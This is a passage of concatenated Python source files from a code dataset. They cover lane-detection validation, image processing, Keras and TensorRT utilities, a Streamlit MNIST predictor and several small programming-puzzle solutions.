0, 1, thickness=1)\n #plot_image = circle(plot_image, (int(x_t[0]), 100) , 3, (1, 1, 1), thickness=1, lineType=8,\n # shift=0)\n #plot_image = circle(plot_image, (int(x_t[-1]), 100), 10, (1, 1, 1), thickness=1, lineType=8,\n # shift=0)\n # plot_image = circle(plot_image, (y_f[2], x_t[2]), 6, (1, 1, 1), thickness=1, lineType=8,\n # shift=0)\n if with_print:\n print('----------------------------------------------------------------------------')\n\n return plot_image\n\ndef plot_image3d(grid, config, is_prediction, with_print= False):\n x = np.arange(-config.grich_anchor_pt, config.grich_anchor_pt, 1 / config.num_of_samples)\n\n fig = plt.figure()\n if is_prediction:\n fig.canvas.set_window_title('Prediction')\n else:\n fig.canvas.set_window_title('Ground_Truth')\n ax = fig.gca(projection='3d')\n # ax.grid(True)\n\n grid_test = np.arange(0, config.img_w, 16)\n ax.set_xticks(grid_test, minor=False)\n ax.set_yticks(grid_test, minor=False)\n # ax.set_yticks(grid_test, minor=True)\n ax.xaxis.grid(True, which='major')\n ax.yaxis.grid(True, which='major')\n #ax.set_zticks(grid_test, minor=False)\n\n # count ground thruth\n counter_gt = 0\n # count pred\n counter_pred = 0\n\n if with_print:\n print('-----------------------New Prediction---------------------------------------')\n\n for k in range(0, config.grid_size):\n for l in range(0, config.grid_size):\n for a in range(config.num_prediction_cells):\n if is_prediction:\n\n a_ko, b, c, conf = grid[k, l, a, :]\n conf = sigmoid(conf)\n\n if conf >= config.conf_thr:\n a_ko = a_ko * config.a_range + config.a_shift\n b = b * config.b_range + config.b_shift\n c = c * config.c_range + config.c_shift\n conf = sigmoid(conf)\n\n y_fill = np.round(a_ko * x ** 2 + b * x + c)\n x_t, y_fill = plot_redy_line(x, y_fill, l, k, config)\n f = np.array([x_t, y_fill]).T\n\n plot_image = np.zeros((config.img_w, config.img_w), dtype=np.float32)\n if with_print:\n print('Score ' + ' a: ' + str(a_ko) + ' b: ' + str(b) + ' c: ' + str(c) + ' conf: ' + str(\n conf)) # + ' Fit correct:' + str(fit_t) + ' Fit wrong:' + str(fit_f))\n\n plot_image = polylines(plot_image, np.int32([f]), 0, 1, thickness=1)\n indices = np.where(plot_image != 0)\n z = np.ones_like(indices[1]) * a\n ax.plot(indices[1], indices[0], z, label='parametric curve')\n # ax.legend()\n #ax.plot(all_lines[1][1], all_lines[1][0], all_lines[1][2]) # , projection='3d')\n counter_pred += 1\n else:\n if grid[k, l, a,-1]:\n x_t, y_f = plot_redy_line(x, grid[k, l, a,:-1], l, k, config)\n z = np.ones_like(x_t) * a\n ax.plot(y_f, x_t, z, label='parametric curve')\n counter_gt += 1\n #ax.legend()\n print('Ground thruth counted: ' + str(counter_gt))\n print('Prediction counted: ' + str(counter_pred))\n if with_print:\n print('----------------------------------------------------------------------------')\n\n return 0\n\ndef iou(line1, line2):\n # assume that the line1 and 2 are [0, 1] images\n sum_line1 = np.sum(line1) # with assumption sum is just only a count\n sum_line2 = np.sum(line2)\n inter_sum = np.sum(line1 *line2)\n union_sum = sum_line1 + sum_line2 - inter_sum\n if union_sum == 0.:\n return 0.\n else:\n return np.divide(inter_sum, union_sum)# return the iou\n\ndef ev_iou_based_assignment(row_ind, col_ind, assignment_matrix, gt_grid_index, pred_grid_index, iou_thr, cfg):\n new_gt_grid_index = []\n new_pred_grid_index = []\n for row_io, col_io in zip(row_ind, col_ind):\n if assignment_matrix[row_io, col_io] >= iou_thr:\n new_pred_grid_index.append(row_io)\n new_gt_grid_index.append(col_io)\n\n TP = len(new_pred_grid_index)\n FP = len(pred_grid_index) - TP\n FN = len(gt_grid_index) - TP\n\n precission = np.divide(TP, (TP + FP))\n recall = np.divide(TP, (TP + FN))\n prod = precission * recall\n sum_prec_rc = precission + recall\n f1 = np.divide(2*(prod), sum_prec_rc)\n\n # for debug reason plot matched gridbox\n if 0:\n not_matched_gt = [x for x in range(len(gt_grid_index)) if x not in new_gt_grid_index] # look for not matched indexs\n not_matched_pred = [x for x in range(len(pred_grid_index)) if x not in new_pred_grid_index] # look for not matched indexs\n plotgrid_gt = np.zeros((cfg.grid_size, cfg.grid_size, 1), dtype=np.float32)\n plotgrid_assigned = np.zeros((cfg.grid_size, cfg.grid_size, cfg.num_prediction_cells), dtype=np.float32)\n f, axarr = plt.subplots(1, 2)\n for k in not_matched_gt:\n r, c = gt_grid_index[k][:2]\n plotgrid_gt[r, c] = 1\n axarr[0].imshow(plotgrid_gt[:, :, 0], cmap='gray') # only for debug\n axarr[0].set_title('FN', color='0.7')\n\n for k in not_matched_pred:\n r, c = pred_grid_index[k][:2]\n plotgrid_assigned[r, c] = 1\n axarr[1].imshow(plotgrid_assigned[:, :, 0], cmap='gray') # only for debug\n axarr[1].set_title('FP', color='0.7')\n##\n for s in row_ind:\n r, c ,a=pred_grid_index[s][0:3]\n plotgrid_assigned[r, c] = 1\n axarr[1].imshow(plotgrid_assigned[:, :, 0], cmap='gray') # only for debug\n axarr[1].set_title('Predicted assigment', color='0.7')\n\n plt.show()\n\n return [precission, recall, f1] ,[TP, FP, FN]\n\ndef grid_based_eval_with_iou(gt, pred, cfg, conf_thr= .51, debug = False):\n x = np.arange(-cfg.grich_anchor_pt, cfg.grich_anchor_pt, 1 / cfg.num_of_samples)\n\n\n gt_grid_index = []\n pred_grid_index = []\n gt_image_list = []\n # go through gt save all lines as list\n for k in range(0, cfg.grid_size):\n for l in range(0, cfg.grid_size):\n for a in range(cfg.num_prediction_cells):\n if gt[k, l, a, -1]:\n\n x_t, y_f = plot_redy_line(x, gt[k, l, a, :-1], l, k ,cfg)\n f = np.array([x_t, y_f]).T\n # here are only the y values, the x values are linear from -anchor point to anchor point\n gt_grid_index.append([k, l, a])\n gt_image = np.zeros((cfg.img_w, cfg.img_h),\n dtype=np.float32) # row # col https://en.wikipedia.org/wiki/Index_notation\n gt_image = polylines(gt_image, np.int32([f]), 0, 1, thickness=cfg.thickness_of_lanes)\n gt_image_list.append(gt_image)\n\n assignment_row = [] # this will be the assignment matrix\n for k in range(0, cfg.grid_size):\n for l in range(0, cfg.grid_size):\n for a in range(cfg.num_prediction_cells):\n\n a_pre, b_pre, c_pre, conf = pred[k, l, a, :]\n conf = sigmoid(conf)\n\n if conf >= conf_thr:\n pred_grid_index.append([k, l, a])\n assignment_col = []\n\n a_pre = a_pre * cfg.a_range + cfg.a_shift\n b_pre = b_pre * cfg.b_range + cfg.b_shift\n c_pre = c_pre * cfg.c_range + cfg.c_shift\n\n pred_image = np.zeros((cfg.img_w, cfg.img_h), dtype=np.float32)\n y_fill = np.round(a_pre * x ** 2 + b_pre * x + c_pre)\n\n x_t, y_fill = plot_redy_line(x, y_fill, l, k, cfg)\n\n f2 = np.array([x_t, y_fill]).T\n pred_image = polylines(pred_image, np.int32([f2]), 0, 1, thickness=cfg.thickness_of_lanes)\n\n for gt_img in gt_image_list:\n assignment_col.append(iou(gt_img, pred_image))\n assignment_row.append(assignment_col)\n\n assignment_matrix = 1 - np.asarray(assignment_row)\n if assignment_matrix.ndim == 2:\n row_ind, col_ind = linear_sum_assignment(assignment_matrix)\n assignment_matrix = 1 - assignment_matrix\n # for debug reason plot matched gridbox\n if debug:\n plotgrid_gt = np.zeros((cfg.grid_size, cfg.grid_size, 1), dtype=np.float32)\n plotgrid_assigned = np.zeros((cfg.grid_size, cfg.grid_size, 1), dtype=np.float32)\n f, axarr = plt.subplots(1, 2)\n for k in range(0, cfg.grid_size):\n for l in range(0, cfg.grid_size):\n for a in range(cfg.num_prediction_cells):\n if gt[k, l, a, -1]:\n plotgrid_gt[k, l] = 1\n axarr[0].imshow(plotgrid_gt[:, :, 0], cmap='gray') # only for debug\n axarr[0].set_title('Ground Thruth', color='0.7')\n\n for s in row_ind:\n r, c=pred_grid_index[s][0:2]\n plotgrid_assigned[r, c] = 1\n axarr[1].imshow(plotgrid_assigned[:, :, 0], cmap='gray') # only for debug\n axarr[1].set_title('Predicted assigment', color='0.7')\n\n plt.show()\n\n small = ev_iou_based_assignment(row_ind, col_ind, assignment_matrix, gt_grid_index, pred_grid_index, cfg.small_iou_Thr, cfg)\n medium = ev_iou_based_assignment(row_ind, col_ind, assignment_matrix, gt_grid_index, pred_grid_index, cfg.medium_iou_Thr, cfg)\n big = ev_iou_based_assignment(row_ind, col_ind, assignment_matrix, gt_grid_index, pred_grid_index, cfg.big_iou_Thr, cfg)\n # count for coefidenz matrix\n return small, medium, big\n else:\n return None\n\ndef nms(pred, cfg):\n x = np.arange(-cfg.grich_anchor_pt, cfg.grich_anchor_pt, 1 / cfg.num_of_samples)\n\n # pred_grid_index = []\n pred_grid_image_list = []\n # go through gt save all lines as list\n for k in range(0, cfg.grid_size):\n for l in range(0, cfg.grid_size):\n for a in range(cfg.num_prediction_cells):\n a_pre, b_pre, c_pre, conf = pred[k, l, a, :]\n conf = sigmoid(conf)\n\n if conf >= cfg.conf_thr:\n a_pre = a_pre * cfg.a_range + cfg.a_shift\n b_pre = b_pre * cfg.b_range + cfg.b_shift\n c_pre = c_pre * cfg.c_range + cfg.c_shift\n\n pred_image = np.zeros((cfg.img_w, cfg.img_h), dtype=np.float32)\n y_fill = np.round(a_pre * x ** 2 + b_pre * x + c_pre)\n x_t, y_fill = plot_redy_line(x, y_fill, l, k, cfg)\n f = np.array([x_t, y_fill]).T\n pred_image = polylines(pred_image, np.int32([f]), 0, 1, thickness=cfg.thickness_of_lanes)\n\n pred_grid_image_list.append([k, l, a, conf, pred_image])\n\n pred_grid_image_list.sort(key=lambda b: b[3], reverse=True) # sort for conf for nms\n\n lenght_pred = len(pred_grid_image_list)\n for i in range(lenght_pred):\n pred_i = pred_grid_image_list[i]\n for j in range(i + 1, lenght_pred):\n boxj = pred_grid_image_list[j]\n if iou(pred_i[-1], boxj[-1]) > cfg.nms_iou_thrs:\n pred[boxj[0], boxj[1], boxj[2]].fill(0.)\n # boxj.c = 0.0\n\n return pred","sub_path":"Validation/validation_utils_lane_only.py","file_name":"validation_utils_lane_only.py","file_ext":"py","file_size_in_byte":15306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"34549709","text":"class Solution:\n def flipAndInvertImage(self, A):\n \"\"\"\n :type A: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n out = []\n for line in A:\n out.append([0 if i else 1 for i in reversed(line)])\n return out\n\nprint(Solution().flipAndInvertImage([[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]]))","sub_path":"flipAndInverImage.py","file_name":"flipAndInverImage.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"193159099","text":"from tqdm import tqdm\nfrom skimage import morphology, io\nimport cv2\nimport os\nimport numpy as np\nimport UtilTools.common\n\n\nclass Image_processing:\n def __init__(self):\n self.c = UtilTools.common.Common()\n\n def smooth_histogram(self, _path: str):\n \"\"\"\n ヒストグラム平滑化する機能。\n :param _path: 平滑化する画像のパス。\n :return:\n \"\"\"\n img = cv2.imread(_path, 2)\n hist, bins = np.histogram(img.flatten(), img.max() + 1, [0, img.max()])\n cdf = hist.cumsum()\n cdf_normalized = cdf * hist.max() / cdf.max()\n cdf_m = np.ma.masked_equal(cdf, 0)\n cdf_m = (cdf_m - cdf_m.min()) * img.max() / (cdf_m.max() - cdf_m.min())\n cdf = np.ma.filled(cdf_m, 0).astype('uint16')\n\n img2 = cdf[img]\n # output_fol = '/'.join(_path.split('/')[0:-1]) + '/smoothed'\n # if self.c.folder_check(output_fol):\n # output_img = ''.join(_path.split('/')[-1].split('.')[0:-1]) + '_smoothed.png'\n # cv2.imwrite(os.path.join(output_fol, '/' + output_img), img2)\n return img2\n\n def gamma_correction(self, _path: str, _gamma: float, _outpath='./'):\n \"\"\"\n ガンマ補正を行う機能。\n :param _path: 補正する画像のパス。\n :param _gamma: ガンマ値。\n :param _outpath: 出力先のフォルダ\n :return:\n \"\"\"\n img = cv2.imread(_path, 0)\n img_gamma = np.zeros_like(img, dtype='uint16')\n m = img.max()\n for h in tqdm(range(img.shape[0])):\n for w in range(img.shape[1]):\n img_gamma[h][w] = m * pow(img[h][w] / m, 1 / _gamma)\n # res = np.hstack((img, img_gamma))\n # cv2.imshow('corrected.', res)\n # cv2.waitKey(0)\n output_img = ''.join(_path.split('/')[-1].split('.')[0:-1]) + '_' + str(_gamma) + '.png'\n if self.c.folder_check(_outpath):\n cv2.imwrite(os.path.join(_outpath, output_img), img_gamma)\n\n def extract_imgs(self, _h: int, _w: int, _path: str, _outpath='./'):\n \"\"\"\n 画像を定形に細切れにする機能。\n :param _h: 細切れにする高さ。\n :param _w: 細切れにする幅。\n :param _path: 細切れにする画像のパス。\n :param _outpath: 細切れにした画像を保存するフォルダのパス。\n :return:\n \"\"\"\n img = cv2.imread(_path, 0)\n if img.shape[0] % _h != 0 or img.shape[1] % _w != 0:\n print('[Warn] Image cannot be divided by _w, or _h.')\n exit(1)\n if not self.c.folder_check(_outpath):\n exit(1)\n for ew in range(0, len(img[1]), _w):\n for eh in range(0, len(img[0]), _h):\n extracted_patch = img[eh:eh + _h - 1, ew:ew + _w - 1]\n cv2.imwrite(os.path.join(_outpath, _path.split('/')[-1].split('.')[0] + '_extpatch_h' + str(eh) + '_w' + str(ew) + '.png'), extracted_patch)\n\n def extract_img(self, _s: list, _h: int, _w: int, _path: str, _outpath='./'):\n \"\"\"\n 画像から単一の画像を切り取る処理\n :param _s: 切り取る開始位置(リスト型変数で、[x,y])\n :param _h: 切り取る画像の高さ\n :param _w: 切り取る画像の幅\n :param _path: 切り取る基の画像のパス\n :param _outpath: 出力先のフォルダのパス\n :return:\n \"\"\"\n if len(_s) != 2:\n print('_s must be list as [x, y].')\n exit(1)\n img = cv2.imread(_path, 0)\n ext_img = img[_s[0]:_s[0] + _h, _s[1]:_s[1] + _w]\n if self.c.folder_check(_outpath):\n cv2.imwrite(os.path.join(_outpath, _path.split('/')[-1].split('.')[0] + '_ext_h' + str(_h) + '_w' + str(_w) + '.png'), ext_img)\n\n def extract_random_img(self, _num: int, _h: int, _w: int, _path: str, _outpath='./'):\n \"\"\"\n 特定の画像から、決まったサイズの画像をランダムに切り取る処理\n :param _num: 切り取る画像の数\n :param _h: 切り取る画像の高さ\n :param _w: 切り取る画像の幅\n :param _path: 切り取る画像ファイルのパス\n :param _outpath: 出力先のフォルダのパス\n :return:\n \"\"\"\n import random\n img = cv2.imread(_path, 0)\n for count in range(0, _num):\n width = random.randint(0, len(img[0, :]) - _w)\n height = random.randint(0, len(img[:, 0]) - _h)\n ext_img = img[height:height + _h, width:width + _w]\n if self.c.folder_check(_outpath):\n cv2.imwrite(os.path.join(_outpath, str(count) + '.png'), ext_img)\n\n def erosion(self, _img: np.array, _kernel_size: int):\n \"\"\"\n 入力画像を収縮する処理\n :param _img:収縮させる画像(ndarray)\n :param _kernel_size:収縮のカーネルサイズ\n :return:\n \"\"\"\n kernel = np.ones((_kernel_size, _kernel_size), np.uint8)\n return cv2.erode(_img, kernel, iterations=1)\n\n def dilation(self, _img: np.ndarray, _kernel_size: int):\n \"\"\"\n 入力画像を膨張させる処理\n :param _img:\n :param _kernel_size:\n :return:\n \"\"\"\n kernel = np.ones((_kernel_size, _kernel_size), np.uint8)\n return cv2.dilate(_img, kernel, iterations=1)\n\n def opening(self, _img: np.ndarray, _kernel_size: int):\n \"\"\"\n 入力画像をオープニング(収縮→膨張)する処理。\n ホワイトノイズを消すのに強い。\n :param _img:\n :param _kernel_size:\n :return:\n \"\"\"\n kernel = np.ones((_kernel_size, _kernel_size), np.uint8)\n return cv2.morphologyEx(_img, cv2.MORPH_OPEN, kernel)\n\n def closing(self, _img: np.ndarray, _kernel_size: int):\n \"\"\"\n 入力画像をクロージング(膨張→収縮)する処理。\n オブジェクト内にあるノイズを消すのに強い。\n :param _img:\n :param _kernel_size:\n :return:\n \"\"\"\n kernel = np.ones((_kernel_size, _kernel_size), np.uint8)\n return cv2.morphologyEx(_img, cv2.MORPH_CLOSE, kernel)\n\n def ma_filter(self):\n pass\n\n def skeltonize(self, _img: np.ndarray):\n \"\"\"\n 細線化する処理\n :param _img: 細線化したい画像ファイル\n :return:\n \"\"\"\n import matplotlib.pyplot as plt\n img = morphology.skeletonize(_img)\n plt.imsave('skel.png', img)\n return img\n","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":6580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"34491222","text":"__author__ = 'jpries1'\n\nimport pandas as pd\n\n# Monthly Income peercodes\nmi_peers = pd.read_csv(r'C:/svn/base/trunk/utils/groups_data/mi_peercodes.csv')\nmi_peers = dict(zip(\n set(mi_peers['FUND'].values),\n [list(mi_peers.loc[mi_peers['FUND'] == f, 'PEERCODE'].values) for f in set(mi_peers['FUND'].values)]\n))\n\nfees = {\n 'Balanced': 0.0216,\n 'Conservative': 0.0175\n}\n\nmorningstar = {\n 'Balanced': 'F00000VAU9',\n 'Conservative': 'F00000VAUN'\n}\n","sub_path":"research/utils/mthlyinc_params.py","file_name":"mthlyinc_params.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"352906059","text":"import keras\nimport keras.backend as K\nimport numpy as np\nimport time\nimport tensorflow as tf\nfrom keras.models import load_model\nfrom keras import optimizers\nimport build_model\n\nclass callmodel(keras.callbacks.Callback):\n def __init__(self, inputs=None, outputs=None, *kargs, **kwargs):\n super(callmodel, self).__init__(*kargs, **kwargs)\n self.inputs = inputs\n self.outputs = outputs\n \n def on_epoch_begin(self, epoch, logs={}):\n def get_layer_output_grad(model, inputs, outputs, layer):\n \"\"\" Gets gradient a layer output for given inputs and outputs\"\"\"\n grads = model.optimizer.get_gradients(model.total_loss, model.layers[layer].output)\n symb_inputs = (model._feed_inputs + model._feed_targets + model._feed_sample_weights)\n f = K.function(symb_inputs, grads)\n x, y, sample_weight = model._standardize_user_data(inputs, outputs)\n output_grad = f(x + y + sample_weight)\n return output_grad\n \n ##############################h_value#######################################\n if epoch ==49:\n K.set_value(self.model.optimizer.add_ah, np.array(0.))\n elif epoch == 20:\n mmodel = build_model.build_model()\n mmodel.set_weights(self.model.get_weights())\n sgd = optimizers.SGD_test(add_ah=0., add_noise=0., h_corr=np.zeros([12,512,512]),a_corr=np.zeros([12,512,512]), lr=0.001, momentum=0.9, nesterov=True)\n mmodel.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=['accuracy'])\n \n index_input = [np.random.randint(0,50000) for _ in range(100)]\n cov = []\n for l_i in [4, 8, 11, 14]:\n h_value = get_layer_output_grad(mmodel, [self.inputs[index_input,:]], [self.outputs[index_input,:]], l_i)[0]\n h_value = h_value.reshape(h_value.shape[0]*h_value.shape[1]*h_value.shape[2],-1)\n h_value = np.mean(h_value,axis=0)\n cov.append(h_value)\n for ii in range(8):\n cov.append(h_value)\n h_corr = []\n for l_i in range(len(cov)):\n split_data = 64\n zz = np.zeros([512,512])\n for i in range(int(len(cov[l_i])/split_data)):\n z = np.kron(cov[l_i][i*split_data:i*split_data+split_data], np.array([cov[l_i][i*split_data:i*split_data+split_data]]).reshape(-1,1))\n z = z / (z.max(axis=1).reshape(-1,1)+0.0001) + np.random.normal(loc=0.0, scale=0.2, size=(split_data,split_data))\n z = np.linalg.inv(z)\n z = z * (-np.ones([len(z),len(z)]) + 2*np.eye(len(z), dtype=float))\n #z = np.abs(z) \n z = z / np.abs(z).sum(axis=1).reshape(-1,1)\n if not np.isnan(np.min(z)):\n zz[i*split_data:i*split_data+split_data,i*split_data:i*split_data+split_data] = z\n else:\n zz[i*split_data:i*split_data+split_data,i*split_data:i*split_data+split_data] = np.eye(split_data, dtype=float)\n h_corr.append(zz)\n K.set_value(self.model.optimizer.h_corr, np.array(h_corr))\n \n\n ","sub_path":"Experiment_5.3/AlexNet_ImageNet32/callmodel.py","file_name":"callmodel.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"233929229","text":"import queue\nimport math\ndef bfs(n,burn):\n toexplore = queue.PriorityQueue()\n toexplore.put(-1*n)\n a1=-1\n a2=-1\n for i in range(burn):\n a = toexplore.get()\n a = -1*a\n if a%2 == 0:\n a1 = a//2\n a2 = a1-1\n else:\n a1 = a//2\n a2 = a//2\n toexplore.put(-1*a1)\n toexplore.put(-1*a2)\n return (a1,a2)\ndef log(n, burn2):\n if burn2 ==0:\n b = 0\n else:\n b = int(math.log(burn2,2))\n toexplore = [n]\n for i in range(b):\n newexplore = []\n for a in toexplore:\n if a % 2 == 0:\n a1 = a // 2\n a2 = a1 - 1\n else:\n a1 = a // 2\n a2 = a // 2\n newexplore.append(a1)\n newexplore.append(a2)\n toexplore=newexplore\n lol = burn2-2**b\n ans = sorted(toexplore, reverse=True)\n ans = ans[lol]\n if ans % 2 == 0:\n a3 = ans // 2\n a4 = a3 - 1\n else:\n a3 = ans // 2\n a4 = ans // 2\n return(a3, a4)\na = open('test.txt', 'r')\nfirst = True\ncounter = 1\nb = open(\"out.txt\", \"w\")\nfor i in a:\n if first:\n t = int(i.strip())\n first = False\n else:\n n,k = [int(j) for j in i.strip().split()]\n burn = k\n #ans2 = bfs(n, burn)\n ans2 = log(n,burn)\n print(counter)\n b.write(\"Case #\" + str(counter) + \": \" + str(ans2[0])+\" \"+ str(ans2[1]) + \"\\n\")\n counter+=1\na.close()\nb.close()","sub_path":"code_jam/2017/3rdproblem.py","file_name":"3rdproblem.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"536185635","text":"import numpy as np\nfrom config import cnf\nimport keras\n\ndata_cnf = cnf.Coffee()\n\ndef load_data(data_set):\n\tdatadir = '/home/zywang/Downloads/CNN_tsc-master/UCR_TS_Archive_2015/'+ data_set + '/' + data_set\n\t#datadir = '/home/zywang/Downloads/CNN_tsc-master/Elec_10/Elec-5-size/'+ data_set + '/' + data_set\n\tdata_test = np.loadtxt(datadir+'_TEST',delimiter=',')\n\tdata_train = np.loadtxt(datadir+'_TRAIN',delimiter=',')\n\tX_train = data_train[:,1:]\n\ty_train = data_train[:,0]\n\n\tX_test = data_test[:,1:]\n\ty_test = data_test[:,0]\n\n\tbase = np.min(y_train) #Check if data is 0-based\n\t\n\tif base == -1:\n\t for i in range(len(y_train)):\n\t if y_train[i] == -1:\n\t \ty_train[i] = 0\n\t for i in range(len(y_test)):\n\t \tif y_test[i] == -1:\n\t \t\ty_test[i] = 0\n\n\telif base != 0:\n\t y_train -=base\n\t y_test -= base\n\n\tX_train = X_train.reshape(-1,1,data_cnf.FEATURE_LEN,1)\n\ty_train = keras.utils.to_categorical(y_train)\n\n\tX_test = X_test.reshape(-1,1,data_cnf.FEATURE_LEN,1)\n\ty_test = keras.utils.to_categorical(y_test)\n\n\treturn X_train, y_train, X_test, y_test\n\ndef get_one_sample(data_set):\n\tdatadir = '/home/zywang/Downloads/CNN_tsc-master/UCR_TS_Archive_2015/'+ data_set + '/' + data_set\n\t#datadir = '/home/zywang/Downloads/CNN_tsc-master/Elec_10/Elec-5-size/'+ data_set + '/' + data_set\n\tdata_test = np.loadtxt(datadir+'_TEST',delimiter=',')\n\tX_test = data_test[:,1:]\n\ttest_sample = X_test[1]\n\n\treturn test_sample","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"527517787","text":"import streamlit as st\nimport torch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torchvision\nimport torch.nn as nn\nimport torchvision.transforms as transforms\nfrom torchvision.utils import save_image\nfrom PIL import Image\nimport os\n\nclass SlimAlexNet(nn.Module):\n def __init__(self, num_classes=10):\n super().__init__()\n self.features = nn.Sequential(\n nn.Conv2d(1,32,kernel_size = 3, stride =1),\n nn.ReLU(inplace = True),\n nn.MaxPool2d(kernel_size =3, stride = 2),\n nn.Conv2d(32,64,kernel_size = 3),\n nn.ReLU(inplace = True),\n nn.MaxPool2d(kernel_size =3, stride = 2),\n nn.Conv2d(64,128,kernel_size = 3, padding =1),\n nn.ReLU(inplace = True),\n nn.Conv2d(128,256,kernel_size = 3, padding =1),\n nn.ReLU(inplace = True),\n nn.Conv2d(256,128,kernel_size = 3, padding =1),\n nn.ReLU(inplace = True),\n nn.MaxPool2d(kernel_size =3, stride = 2),\n )\n self.classifier = nn.Sequential(\n nn.Dropout(),\n nn.Linear(128,1024),\n nn.ReLU(inplace= True),\n nn.Dropout(),\n nn.Linear(1024,1024),\n nn.ReLU(inplace= True),\n nn.Linear(1024,num_classes)\n )\n def forward(self,x):\n x = self.features(x)\n x = x.flatten(start_dim=1)\n x = self.classifier(x)\n return x \n \ndef predict(im):\n inputs = transform(im)\n inputs = inputs.to(device)\n results = net(inputs.unsqueeze(0)).argmax(dim=1).to('cpu').numpy() \n return results[0]\n\n\ntransform = transforms.Compose([transforms.ToTensor()])\nnet = SlimAlexNet(num_classes=10)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nnet.to(device)\nnet.load_state_dict(torch.load('best_model.pt', map_location=lambda storage, loc: storage))\n\n\n\n#streamlit start\nst.title(\"Welcome to Handwritten Digits Preditor\")\nst.markdown(\"This application is a Streamlit dashboard that can be used \"\n \"to predict 0-9 🗽💥🚗\")\n\ninput_buffer = st.file_uploader(\"Upload a handwritten digit\", type=(\"png\", \"jpg\"))\n\nif st.button(\"Predict\"): \n im = Image.open(input_buffer).convert('L')\n im = im.resize((28,28),Image.NEAREST)\n result = predict(im)\n rsl = 'Congratulations! Your uploaded digit predicted as: %d'%result\n st.text(rsl)\n st.balloons()\n\n \n\n \n\n\n\n\n\n","sub_path":"mnist_streamlit.py","file_name":"mnist_streamlit.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"378941533","text":"#first way.........possible in all lang\na = int(input(\"Enter A:\"))\nb = int(input(\"Enter B:\"))\n\na = a+b\nb =a-b\na =a-b\nprint(\"First Method...1\")\nprint(\"A:{} and B:{}\".format(a,b))\n\n#second way.......Only in python lang possible\nprint(\"Second Method...2\")\na,b = b,a\nprint(\"A:{} and B:{}\".format(a,b))\n\n","sub_path":"swap_logic.py","file_name":"swap_logic.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515679616","text":"#\n# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ~~~Medcare AI Lab~~~\n# 代码来源:https://github.com/NVIDIA/trt-samples-for-hackathon-cn/blob/master/python/ (仅做简单修改)\n\nfrom functools import reduce\nimport tensorrt\nimport torch\nimport numpy as np\n\nclass TrtLite:\n def __init__(self, build_engine_proc = None, build_engine_params = None, engine_file_path = None):\n logger = tensorrt.Logger(tensorrt.Logger.INFO)\n if engine_file_path is None:\n with tensorrt.Builder(logger) as builder:\n if build_engine_params is not None:\n self.engine = build_engine_proc(builder, *build_engine_params)\n else:\n self.engine = build_engine_proc(builder)\n else:\n with open(engine_file_path, 'rb') as f, tensorrt.Runtime(logger) as runtime:\n self.engine = runtime.deserialize_cuda_engine(f.read())\n self.context = self.engine.create_execution_context()\n \n def __del__(self):\n self.engine = None\n self.context = None\n print(\"[INFO] 释放模型\")\n \n def save_to_file(self, engine_file_path):\n with open(engine_file_path, 'wb') as f:\n f.write(self.engine.serialize())\n \n def get_io_info(self, input_desc):\n def to_numpy_dtype(trt_dtype):\n tb = {\n tensorrt.DataType.BOOL: np.dtype('bool'),\n tensorrt.DataType.FLOAT: np.dtype('float32'),\n tensorrt.DataType.HALF: np.dtype('float16'),\n tensorrt.DataType.INT32: np.dtype('int32'),\n tensorrt.DataType.INT8: np.dtype('int8'),\n }\n return tb[trt_dtype]\n\n if isinstance(input_desc, dict):\n if self.engine.has_implicit_batch_dimension:\n print('Engine was built with static-shaped input so you should provide batch_size instead of i2shape')\n return\n i2shape = input_desc\n for i, shape in i2shape.items():\n self.context.set_binding_shape(i, shape)\n return [(self.engine.get_binding_name(i), self.engine.binding_is_input(i), \n tuple(self.context.get_binding_shape(i)), to_numpy_dtype(self.engine.get_binding_dtype(i))) for i in range(self.engine.num_bindings)]\n \n batch_size = input_desc\n return [(self.engine.get_binding_name(i), \n self.engine.binding_is_input(i), \n (batch_size,) + tuple(self.context.get_binding_shape(i)), \n to_numpy_dtype(self.engine.get_binding_dtype(i))) for i in range(self.engine.num_bindings)]\n \n def allocate_io_buffers(self, input_desc, on_gpu):\n io_info = self.get_io_info(input_desc)\n if io_info is None:\n return\n if on_gpu:\n cuda = torch.device('cuda')\n np2pth = {\n np.dtype('bool'): torch.bool,\n np.dtype('float32'): torch.float32,\n np.dtype('float16'): torch.float16,\n np.dtype('int32'): torch.int32,\n np.dtype('int8'): torch.int8,\n }\n return [torch.empty(i[2], dtype=np2pth[i[3]], device=cuda) for i in io_info]\n else:\n return [np.zeros(i[2], i[3]) for i in io_info]\n\n def execute(self, bindings, input_desc, 